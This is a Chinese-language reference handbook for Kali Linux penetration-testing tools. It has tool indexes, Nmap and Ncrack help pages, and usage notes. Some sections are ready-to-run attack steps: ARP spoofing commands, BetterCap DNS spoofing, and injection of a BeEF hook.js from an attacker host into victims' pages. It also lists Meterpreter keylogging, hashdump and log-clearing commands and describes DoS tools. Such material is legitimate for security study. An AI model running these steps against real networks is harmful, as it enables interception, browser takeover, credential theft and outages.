目录¶
介绍¶
目录¶
信息收集 (Information Gathering)¶
acccheck¶
ace-voip¶
amap¶
automater¶
bing-ip2hosts¶
braa¶
casefile¶
cdpsnarf¶
cisco-torch¶
cookie-cadger¶
copy-router-config¶
dmitry¶
dnmap¶
dnsenum¶
dnsmap¶
dnsrecon¶
dnstracer¶
dnswalk¶
dotdotpwn¶
enum4linux¶
enumiax¶
exploitdb¶
fierce¶
firewalk¶
fragroute¶
fragrouter¶
ghost-phisher¶
golismero¶
goofile¶
hping3¶
intrace¶
ismtp¶
lbd¶
maltego-teeth¶
masscan¶
metagoofil¶
miranda¶
Nmap¶
root@kali:~# nmap -h
Nmap 6.00 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL <inputfilename>: Input from list of hosts/networks
-iR <num hosts>: Choose random targets
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks
--excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sn: Ping Scan - disable port scan
-Pn: Treat all hosts as online -- skip host discovery
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers <serv1[,serv2],...>: Specify custom DNS servers
--system-dns: Use OS's DNS resolver
--traceroute: Trace hop path to each host
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags <flags>: Customize TCP scan flags
-sI <zombie host[:probeport]>: Idle scan
-sY/sZ: SCTP INIT/COOKIE-ECHO scans
-sO: IP protocol scan
-b <FTP relay host>: FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports consecutively - don't randomize
--top-ports <number>: Scan <number> most common ports
--port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
--version-intensity <level>: Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
-sC: equivalent to --script=default
--script=<Lua scripts>: <Lua scripts> is a comma separated list of
directories, script-files or script-categories
--script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
--script-args-file=filename: provide NSE script args in a file
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
--script-help=<Lua scripts>: Show help about scripts.
<Lua scripts> is a comma separted list of script-files or
script-categories.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take <time> are in seconds, or append 'ms' (milliseconds),
's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
-T<0-5>: Set timing template (higher is faster)
--min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
--min-parallelism/max-parallelism <numprobes>: Probe parallelization
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
probe round trip time.
--max-retries <tries>: Caps number of port scan probe retransmissions.
--host-timeout <time>: Give up on target after this long
--scan-delay/--max-scan-delay <time>: Adjust delay between probes
--min-rate <number>: Send packets no slower than <number> per second
--max-rate <number>: Send packets no faster than <number> per second
FIREWALL/IDS EVASION AND SPOOFING:
-f; --mtu <val>: fragment packets (optionally w/given MTU)
-D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
-S <IP_Address>: Spoof source address
-e <iface>: Use specified interface
-g/--source-port <portnum>: Use given port number
--data-length <num>: Append random data to sent packets
--ip-options <options>: Send packets with specified ip options
--ttl <val>: Set IP time-to-live field
--spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
--badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
and Grepable format, respectively, to the given filename.
-oA <basename>: Output in the three major formats at once
-v: Increase verbosity level (use -vv or more for greater effect)
-d: Increase debugging level (use -dd or more for greater effect)
--reason: Display the reason a port is in a particular state
--open: Only show open (or possibly open) ports
--packet-trace: Show all packets sent and received
--iflist: Print host interfaces and routes (for debugging)
--log-errors: Log errors/warnings to the normal-format output file
--append-output: Append to rather than clobber specified output files
--resume <filename>: Resume an aborted scan
--stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
--webxml: Reference stylesheet from Nmap.Org for more portable XML
--no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
-6: Enable IPv6 scanning
-A: Enable OS detection, version detection, script scanning, and traceroute
--datadir <dirname>: Specify custom Nmap data file location
--send-eth/--send-ip: Send using raw ethernet frames or IP packets
--privileged: Assume that the user is fully privileged
--unprivileged: Assume the user lacks raw socket privileges
-V: Print version number
-h: Print this help summary page.
EXAMPLES:
nmap -v -A scanme.nmap.org
nmap -v -sn 192.168.0.0/16 10.0.0.0/8
nmap -v -iR 10000 -Pn -p 80
SEE THE MAN PAGE (http://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES
ntop¶
p0f¶
parsero¶
recon-ng¶
set¶
smtp-user-enum¶
snmpcheck¶
sslcaudit¶
sslsplit¶
sslstrip¶
sslyze¶
thc-ipv6¶
theharvester¶
tlssled¶
twofi¶
urlcrazy¶
Wireshark¶
wol-e¶
xplico¶
漏洞分析 (Vulnerability Analysis)¶
bbqsql¶
bed¶
cisco-auditing-tool¶
cisco-global-exploiter¶
cisco-ocs¶
dbpwaudit¶
doona¶
greenbone-security-assistant¶
gsd¶
hexorbase¶
inguma¶
jsql¶
lynis¶
ohrwurm¶
openvas-administrator¶
openvas-cli¶
openvas-manager¶
openvas-scanner¶
oscanner¶
powerfuzzer¶
sfuzz¶
sidguesser¶
siparmyknife¶
SQLmap¶
sqlninja¶
sqlsus¶
tnscmd10g¶
unix-privesc-check¶
yersinia¶
无线攻击 (Wireless Attacks)¶
Aircrack-ng¶
asleap¶
bluelog¶
bluemaho¶
bluepot¶
blueranger¶
bluesnarfer¶
bully¶
cowpatty¶
crackle¶
eapmd5pass¶
fern-wifi-cracker¶
giskismet¶
gqrx¶
gr-scan¶
kalibrate-rtl¶
killerbee¶
Kismet¶
mdk3¶
mfcuk¶
mfoc¶
mfterm¶
multimon-ng¶
pixiewps¶
reaver¶
redfang¶
rtlsdr-scanner¶
spooftooph¶
wifi-honey¶
wifitap¶
wifite¶
Web 应用程序 (Web Applications)¶
apache-users¶
arachni¶
blindelephant¶
Burp Suite¶
cutycapt¶
davtest¶
deblaze¶
dirb¶
dirbuster¶
fimap¶
funkload¶
grabber¶
jboss-autopwn¶
joomscan¶
padbuster¶
paros¶
plecost¶
proxystrike¶
skipfish¶
ua-tester¶
uniscan¶
vega¶
W3af¶
webscarab¶
webshag¶
webslayer¶
websploit¶
wfuzz¶
wpscan¶
xsser¶
zaproxy¶
开发工具 (Exploitation Tools)¶
取证工具 (Forensics Tools)¶
压力测试 (Stress Testing)¶
嗅探和欺骗 (Sniffing & Spoofing)¶
密码攻击 (Password Attacks)¶
cewl¶
cmospwd¶
creddump¶
crunch¶
findmyhash¶
gpp-decrypt¶
hash-identifier¶
THC Hydra¶
john-the-ripper¶
johnny¶
keimpx¶
maskprocessor¶
multiforcer¶
Ncrack¶
Ncrack 是一个高速的网络认证破解工具。 Ncrack 采用模块化方法,类似的 Nmap 命令行语法和动态引擎,可以根据网络的反馈调整其行为而设计的。 它允许多个主机的快速而可靠的大规模审计。
Ncrack的功能包括一个非常灵活的接口授予网络操作的用户的完全控制,允许非常复杂的暴力破解攻击, 定时模板为便于使用的,类似的Nmap的并有更多的运行时的交互。 支持的协议包括:RDP、SSH、http(s)、SMB、pop3(s)、VNC、FTP、telnet.
root@kali:~# ncrack -h
Ncrack 0.4ALPHA ( http://ncrack.org )
Usage: ncrack [Options] {target and service specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iX <inputfilename>: Input from Nmap's -oX XML output format
-iN <inputfilename>: Input from Nmap's -oN Normal output format
-iL <inputfilename>: Input from list of hosts/networks
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks
--excludefile <exclude_file>: Exclude list from file
SERVICE SPECIFICATION:
Can pass target specific services in <service>://target (standard) notation or
using -p which will be applied to all hosts in non-standard notation.
Service arguments can be specified to be host-specific, type of service-specific
(-m) or global (-g). Ex: ssh://10.0.0.10,at=10,cl=30 -m ssh:at=50 -g cd=3000
Ex2: ncrack -p ssh,ftp:3500,25 10.0.0.10 scanme.nmap.org google.com:80,ssl
-p <service-list>: services will be applied to all non-standard notation hosts
-m <service>:<options>: options will be applied to all services of this type
-g <options>: options will be applied to every service globally
Misc options:
ssl: enable SSL over this service
path <name>: used in modules like HTTP ('=' needs escaping if used)
TIMING AND PERFORMANCE:
Options which take <time> are in seconds, unless you append 'ms'
(miliseconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
Service-specific options:
cl (min connection limit): minimum number of concurrent parallel connections
CL (max connection limit): maximum number of concurrent parallel connections
at (authentication tries): authentication attempts per connection
cd (connection delay): delay <time> between each connection initiation
cr (connection retries): caps number of service connection attempts
to (time-out): maximum cracking <time> for service, regardless of success so far
-T<0-5>: Set timing template (higher is faster)
--connection-limit <number>: threshold for total concurrent connections
AUTHENTICATION:
-U <filename>: username file
-P <filename>: password file
--user <username_list>: comma-separated username list
--pass <password_list>: comma-separated password list
--passwords-first: Iterate password list for each username. Default is opposite.
OUTPUT:
-oN/-oX <file>: Output scan in normal and XML format, respectively, to the given filename.
-oA <basename>: Output in the two major formats at once
-v: Increase verbosity level (use twice or more for greater effect)
-d[level]: Set or increase debugging level (Up to 10 is meaningful)
--nsock-trace <level>: Set nsock trace level (Valid range: 0 - 10)
--log-errors: Log errors/warnings to the normal-format output file
--append-output: Append to rather than clobber specified output files
MISC:
--resume <file>: Continue previously saved session
-f: quit cracking service after one found credential
-6: Enable IPv6 cracking
-sL or --list: only list hosts and services
--datadir <dirname>: Specify custom Ncrack data file location
-V: Print version number
-h: Print this help summary page.
MODULES:
FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC
EXAMPLES:
ncrack -v --user root localhost:22
ncrack -v -T5 https://192.168.0.1
ncrack -v -iX ~/nmap.xml -g CL=5,to=1h
SEE THE MAN PAGE (http://nmap.org/ncrack/man.html) FOR MORE OPTIONS AND EXAMPLES
oclgausscrack¶
pack¶
patator¶
phrasendrescher¶
polenum¶
rainbowcrack¶
rcracki-mt¶
rsmangler¶
sqldict¶
statsprocessor¶
thc-pptp-bruter¶
truecrack¶
wordlists¶
维护访问 (Maintaining Access)¶
逆向工程 (Reverse Engineering)¶
Arpspoof¶
开启IP转发
echo 1 >> /proc/sys/net/ipv4/ip_forward
查看网段信息
ip a
对被攻击者进行 ARP 欺骗
arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
查看 ARP 映射表
arp -a
Dnsspoof¶
Angry IP Scanner¶
BetterCap¶
BetterCap 是中间人攻击中的一种工具,用于替代知名但老旧的 Ettercap。
一些主要功能包括:
- 全双工和半双工 ARP 欺诈
- 真正的 ICMP DoubleDirect 欺诈实现
- 配置 DNS 欺诈
- 实时和完全的 automatized 主机发现
- 实时的认证证书协议的捕获,如 HTTP(S) 发布的数据,基本和数字认证 FTP, IRC, POP, IMAP, SMTP, NTLM ( HTTP, SMB, LDAP, etc ) 等等
- 完全自定义的网络嗅探器
- 模块化的 HTTP 和用户插件 + 内置插件注入自定义的 HTML 代码,JS 或 CSS 文件和 URL 支持的 HTTPS 透明代理
- SSLStripping
- 内置 HTTP 服务器
安装¶
BetterCap 是 Ruby编写的,这意味着你将需要一个Ruby解释器 (> = 1.9),并安装了 RubyGems 的环境
依赖¶
所有的依赖性将通过 GEM
系统自动安装,在某些情况下,你可能需要自己安装这些本地的依赖性:
apt-get install build-essential ruby-dev libpcap-dev
开发版本¶
开发版本是最新的版本,你也可以从克隆GitHub的库的源代码, 这会给你所有最新和实验功能,但请记住,您使用的是潜在的不稳定版本:
git clone https://github.com/evilsocket/bettercap.git
cd bettercap
bundle install
gem build bettercap.gemspec
sudo gem install bettercap*.gem
网络欺骗¶
你可以针对整个局域网或单个目标
选项¶
-S, --spoofer NAME
欺骗者模块来使用,可得:ARP,ICMP,NONE,如果没有欺骗程序指定的默认(ARP)将被选择
-T, --target ADDRESS1,ADDRESS2,...
针对指定的目标 IP 或 MAC 地址,在没有指定完整的子网情况下
--ignore ADDRESS1,ADDRESS2
忽略指定的某些地址
--dns FILE
启用 DNS 欺骗服务器,并指定一个文件作为一个主机解析表
--dns-port PORT
设置 DNS 服务器的端口,默认为 5300
--kill
相反,转发数据包,这种交换机会将目标的连接被杀害。
--no-spoofing
禁止欺骗,别名 --spoofer NONE
--half-duplex
启用半双工中间人,这将使 bettercap 工作在这种情况下,当路由器不容易(见下文)
DNS 欺骗¶
如果要执行DNS欺骗,你必须指定 --dns FILE
命令行参数,这里的 FILE 值
是由类似下面的条目组成文件的名称:
# Empty lines or lines starting with # will be ignored.
# redirect *.google.com to the attacker ip address
local .*google\.com
# redirect *.microsoft.com to 10.10.10.10
10.10.10.10 .*microsoft\.com
组合 BeEF 框架使用¶
在中间人攻击中对目标主机访问的每个网页中注入 BeEF 的 hook.js
使之可被 BeEF 控制。
启动 BeEF 框架
cd /opt/beef-xss
./beef
记下你的 Hook URL (http://192.168.1.101:3000/hook.js)
打开另一个终端,启动 BetterCap (注意:替换成你的URL)
bettercap --proxy-module injectjs --js-url "http://192.168.1.101:3000/hook.js"
如果你需要指定一个特定的目标,使用 -T
参数
bettercap -T 192.168.1.102 --proxy-module injectjs --js-url "http://192.168.1.101:3000/hook.js"
BetterCap 将开始欺骗目标,将 JavaScript 注入到目标主机访问的每一个网页上
现在打开你的浏览器,登录到 BeEF 的控制台 (http://192.168.1.101:3000/ui/panel) ,如果一切正常,你应该能看到被控制的目标浏览器。
BurpKit¶
Cain & Abel¶
Dig¶
dig (Domain Information Groper) 是个常用的域名查询工具。dig 的功能比 nslookup 更强大。
用法¶
dig 基本的用法
dig www.exmaple.com
; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> www.exmaple.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63806
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 7
;; QUESTION SECTION:
;www.exmaple.com. IN A
;; ANSWER SECTION:
www.exmaple.com. 86400 IN A 85.119.83.248 // 主机名对应的 IP 地址
;; AUTHORITY SECTION:
exmaple.com. 86365 IN NS a.authns.bitfolk.co.uk.
exmaple.com. 86365 IN NS c.authns.bitfolk.com.
exmaple.com. 86365 IN NS b.authns.bitfolk.com.
exmaple.com. 86365 IN NS numpty.absolutelyplastered.com.
;; ADDITIONAL SECTION:
a.authns.bitfolk.co.uk. 172800 IN A 85.119.80.222
a.authns.bitfolk.co.uk. 172800 IN AAAA 2001:ba8:1f1:f019::53
b.authns.bitfolk.com. 172764 IN A 174.136.109.67
b.authns.bitfolk.com. 172764 IN AAAA 2607:f2f8:a104::53
c.authns.bitfolk.com. 172764 IN A 173.255.227.192
c.authns.bitfolk.com. 172764 IN AAAA 2600:3c03::31:2053
numpty.absolutelyplastered.com. 172764 IN A 85.119.82.19
;; Query time: 255 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Mon Feb 22 21:27:01 2016
;; MSG SIZE rcvd: 321
Driftnet¶
- 网站:
- GitHub:https://github.com/deiv/driftnet
使用¶
语法: driftnet [options] [filter code]
主要参数¶
-b | 捕获到新的图片时发出嘟嘟声 |
-i | interface 选择监听接口 |
-f | file 读取一个指定pcap数据包中的图片 |
-p | 不让所监听的接口使用混杂模式 |
-a | 后台模式:将捕获的图片保存到目录中(不会显示在屏幕上) |
-m number | 指定保存图片数的数目 |
-d directory | 指定保存图片的路径 |
-x prefix | 指定保存图片的前缀名 |
使用举例¶
1.实时监听: driftnet -i wlan0
2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/
Ettercap¶
High Orbit Ion Cannon¶
High Orbit Ion Cannon 是一款 DoS 攻击工具。
特征¶
- 高速多线程 HTTP 洪水攻击
- 同一时间对一个网站洪水攻击高达256次
- 内置的脚本系统,以便部署 “boosters” 。脚本旨在对抗 DDoS 攻击的防御对策和提高产量的 DoS 部署。
- 易于使用的界面
- 可以移植到 Linux/Mac 有一些bug待修复(我没有这些系统)
- 能在攻击时选择线程数
- 能够设置攻击级别:低,中,高
Hping¶
John the Ripper¶
Low Orbit Ion Canon¶
Metaspoilt¶
Metasploit¶
使用¶
Core Commands¶
Command | Description |
---|---|
? | 帮助菜单 |
background | 将当前会话移动到背景 |
bgkill | 杀死一个背景 meterpreter 脚本 |
bglist | 提供所有正在运行的后台脚本的列表 |
bgrun | 作为一个后台线程运行脚本 |
channel | 显示活动频道 |
close | 关闭通道 |
exit | 终止 meterpreter 会话 |
help | 帮助菜单 |
interact | 与通道进行交互 |
irb | 进入 Ruby 脚本模式 |
migrate | 移动到一个指定的 PID 的活动进程 |
quit | 终止 meterpreter 会话 |
read | 从通道读取数据 |
run | 执行以后它选定的 meterpreter 脚本 |
use | 加载 meterpreter 的扩展 |
write | 将数据写入到一个通道 |
文件系统命令¶
Command | Description |
---|---|
cat | 读取并输出到标准输出文件的内容 |
cd | 更改目录对受害人 |
del | 删除文件对受害人 |
download | 从受害者系统文件下载 |
edit | 用 vim编辑文件 |
getlwd | 打印本地目录 |
getwd | 打印工作目录 |
lcd | 更改本地目录 |
lpwd | 打印本地目录 |
ls | 列出在当前目录中的文件列表 |
mkdir | 在受害者系统上的创建目录 |
pwd | 输出工作目录 |
rm | 删除文件 |
rmdir | 受害者系统上删除目录 |
upload | 从攻击者的系统往受害者系统上传文件 |
网络命令¶
Command | Description |
---|---|
ipconfig | 显示网络接口的关键信息,包括 IP 地址、 等。 |
portfwd | 端口转发 |
route | 查看或修改受害者路由表 |
系统命令¶
Command | Description |
---|---|
clearav | 清除了受害者的计算机上的事件日志 |
drop_token | 被盗的令牌 |
execute | 执行命令 |
getpid | 获取当前进程 ID (PID) |
getprivs | 尽可能获取尽可能多的特权 |
getuid | 获取作为运行服务器的用户 |
kill | 终止指定 PID 的进程 |
ps | 列出正在运行的进程 |
reboot | 重新启动受害人的计算机 |
reg | 与受害人的注册表进行交互 |
rev2self | 在受害者机器上调用 RevertToSelf() |
shell | 在受害者计算机上打开一个shell |
shutdown | 关闭了受害者的计算机 |
steal_token | 试图窃取指定的 (PID) 进程的令牌 |
sysinfo | 获取有关受害者计算机操作系统和名称等的详细信息 |
用户界面命令¶
Command | Description |
---|---|
enumdesktops | 列出所有可访问台式机 |
getdesktop | 获取当前的 meterpreter 桌面 |
idletime | 检查长时间以来,受害者系统空闲进程 |
keyscan_dump | 键盘记录软件的内容转储 |
keyscan_start | 启动时与如 Word 或浏览器的进程相关联的键盘记录软件 |
keyscan_stop | 停止键盘记录软件 |
screenshot | 抓去 meterpreter 桌面的屏幕截图 |
set_desktop | 更改 meterpreter 桌面 |
uictl | 启用用户界面组件的一些控件 |
特权升级命令¶
Command | Description |
---|---|
getsystem | 获得系统管理员权限 |
密码转储命令¶
Command | Description |
---|---|
hashdump | 抓去哈希密码 (SAM) 文件中的值 |
Timestomp 命令¶
Command | Description |
---|---|
timestomp | 操作修改,访问,并创建一个文件的属性 |
Mimikatz¶
Nessus¶
Netcat¶
Nikto¶
NoSQLMap¶
NoSQLMap 是一款开源 Python 工具,可以帮助安全测试人员自动化对 NoSQL 数据库进行攻击测试。 目前这款工具的漏洞利用程序围绕 MongoDB,但是以后会支持更多的 NoSQL 数据库,如:CouchDB、Redis、Cassandra。
安装¶
要求¶
在一个基于 Debian 或 Red Hat 系统,setup
脚本可能会以 root
身份来自动安装 NoSqlMap 的依赖
根据使用的功能有所不同:
- Metasploit Framework
- Python 和 PyMongo
- httplib2
- urllib
- 一个本地默认MongoDB实例对数据库进行复制。点击 这里 查看安装说明。
编译安装¶
git clone https://github.com/tcstool/NoSQLMap.git
cd NoSQLMap
python setup.py install
用法¶
启动 NoSQLMap
./nosqlmap.py
当打开 NoSQLMap 时你会看到主菜单:
1-Set options (do this first) // 1-设置选项(第一步操作)
2-NoSQL DB Access Attacks // 2-NoSQL DB 访问攻击
3-NoSQL Web App attacks // 3-NoSQL Web应用攻击
4-Scan for Anonymous MongoDB Access // 4-扫描匿名 MongoDB 访问
x-Exit // x-退出
菜单说明¶
1.设置目标 host/host/IP 目标 Web 服务器 如:(www.google.com) 或者任何你想要攻击的 MongoDB 服务器。
2.设置 Web 应用 port-TCP 如果一个 Web 应用成为目标,为 Web 应用设置 TCP 端口。
3.设置 URI 路径,部分 URI 包含页面名称及任何非主机名称的参数 如:(/app/acct.php?acctid=102)。
4.设置 HTTP 请求方法 (GET/POST) 设置请求方法为 GET 或 POST ;现在只能使用 GET 方法但是后续会增加 POST 方法。
5.设置我的本地 Mongo/Shell IP-Set 如果直接攻击一个 MongoDB 实例,设置这个选项到目标 Mongo 安装的IP来复制受害者服务器或打开 Meterpreter Shell。
6.设置 Shell 监听端口,如果开放 Meterpreter Shell 就会指定端口。
7.加载选项 file-Load 加载之前保存的 1-6 中的设置。
8.加载选项 从 Burp 保存的 (request-Parse) 请求中加载 Burp Suite 的请求,并填充 Web 应用选项。、
9.保存选项设置 file-Save 保存 1-6 中的设置以便未来使用。
x.返回主菜单 meun-Use 使用这个选项开始攻击。
演示视频¶
MongoDB 中的 SqlMap 管理攻击演示
Nslookup¶
OpenVAS¶
OWASP HTTP Post Tool¶
OWASP HTTP Post Tool 是用于测试 Web 应用程序的可靠性,性能和容量规划服务的工具。
OWASP弹簧刀提供了3种不同类型的测试方式:SSL连接半、HTTP POST 攻击、Slowloris。
Ping¶
ping 是个网络测试命令,用于测试网络的联通性,几乎所有所有操作系统都自带。
Linux¶
用法¶
ping [参数] [IP地址或主机名]
ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface]
[-M pmtudisc-hint] [-m mark] [-S sndbuf]
[-T tstamp-options] [-Q tos] [hop1 ...] destination
参数¶
-d 使用Socket的SO_DEBUG功能。
-f 极限检测。大量且快速地送网络封包给一台机器,看它的回应。
-n 只输出数值。
-q 不显示任何传送封包的信息,只显示最后的结果。
-r 忽略普通的Routing Table,直接将数据包送到远端主机上。通常是查看本机的网络接口是否有问题。
-R 记录路由过程。
-v 详细显示指令的执行过程。
<p>-c 数目:在发送指定数目的包后停止。
-i 秒数:设定间隔几秒送一个网络封包给一台机器,预设值是一秒送一次。
-I 网络界面:使用指定的网络界面送出数据包。
-l 前置载入:设置在送出要求信息之前,先行发出的数据包。
-p 范本样式:设置填满数据包的范本样式。
-s 字节数:指定发送的数据字节数,预设值是56,加上8字节的ICMP头,一共是64ICMP数据字节。
-t 存活数值:设置存活数值TTL的大小。
Windows¶
用法¶
ping [选项] [IP地址或主机名]
ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] [-R] [-S srcaddr] [-c compartment] [-p]
[-4] [-6] target_name
选项¶
-t Ping 指定的主机,直到停止。
若要查看统计信息并继续操作,请键入 Ctrl+Break;
若要停止,请键入 Ctrl+C。
-a 将地址解析为主机名。
-n count 要发送的回显请求数。
-l size 发送缓冲区大小。
-f 在数据包中设置“不分段”标记(仅适用于 IPv4)。
-i TTL 生存时间。
-v TOS 服务类型(仅适用于 IPv4。该设置已被弃用,
对 IP 标头中的服务类型字段没有任何
影响)。
-r count 记录计数跃点的路由(仅适用于 IPv4)。
-s count 计数跃点的时间戳(仅适用于 IPv4)。
-j host-list 与主机列表一起使用的松散源路由(仅适用于 IPv4)。
-k host-list 与主机列表一起使用的严格源路由(仅适用于 IPv4)。
-w timeout 等待每次回复的超时时间(毫秒)。
-R 同样使用路由标头测试反向路由(仅适用于 IPv6)。
根据 RFC 5095,已弃用此路由标头。
如果使用此标头,某些系统可能丢弃
回显请求。
-S srcaddr 要使用的源地址。
-c compartment 路由隔离舱标识符。
-p Ping Hyper-V 网络虚拟化提供程序地址。
-4 强制使用 IPv4。
-6 强制使用 IPv6。
target_name IP地址或域名。
PyLoris¶
PyLoris 是用于测试服务器漏洞,进行连接耗尽性能拒绝服务的 DoS 攻击可脚本工具。 PyLoris 可以利用 SOCKS 代理和 SSL 连接,并且可以指定协议,如:HTTP、FTP、SMTP、IMAP、Telnet。
特性¶
- Tkinter GUI
- Scripting API
- Anonymity
- TOR Proxying
- SOCKS Proxying
Sandcat Browser¶
Sandcat Browser 是一款便携的渗透测试专用浏览器,基于Google Chrome内核。 免费、方便携带、主要用做渗透测试并且支持多标签。 包含了许多安全扩展插件,以扩展和脚本的形式打造渗透测试工具包。
Scapy¶
Snort¶
TCPdump¶
Tor’s Hammer¶
Tor’s Hammer 是用 Python 写的 DOS 测试工具。它也可以通过 Tor 网络运行进行匿名。
如果你想使用 Tor 运行,需安装TOR并监听于 127.0.0.1:9050
。
攻击通过单一实例上运行 Apache 和 IIS 最不受保护的 Web 服务器。
- SourceForge:https://sourceforge.net/projects/torshammer/
使用¶
启动 Tor’s Hammer
./torshammer.py
帮助信息:
/*
* Tor's Hammer
* Slow POST DoS Testing Tool
* Version 1.0 Beta
* Anon-ymized via Tor
* We are Anonymous.
* We are Legion.
* We do not forgive.
* We do not forget.
* Expect us!
*/
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
-t|--target <Hostname|IP>
-r|--threads <Number of threads> Defaults to 256
-p|--port <Web Server Port> Defaults to 80
-T|--tor Enable anonymising through tor on 127.0.0.1:9050
-h|--help Shows this help
Eg. ./torshammer.py -t 192.168.1.100 -r 256
Whois¶
XOIC¶
XOIC 是一个 DoS 攻击工具。 有关DoS攻击的更多信息:http://de.wikipedia.org/wiki/Denial_of_Service 该工具可对任何IP地址进行 (D)DoS 攻击,用户可以自己指定的特定的端口和协议。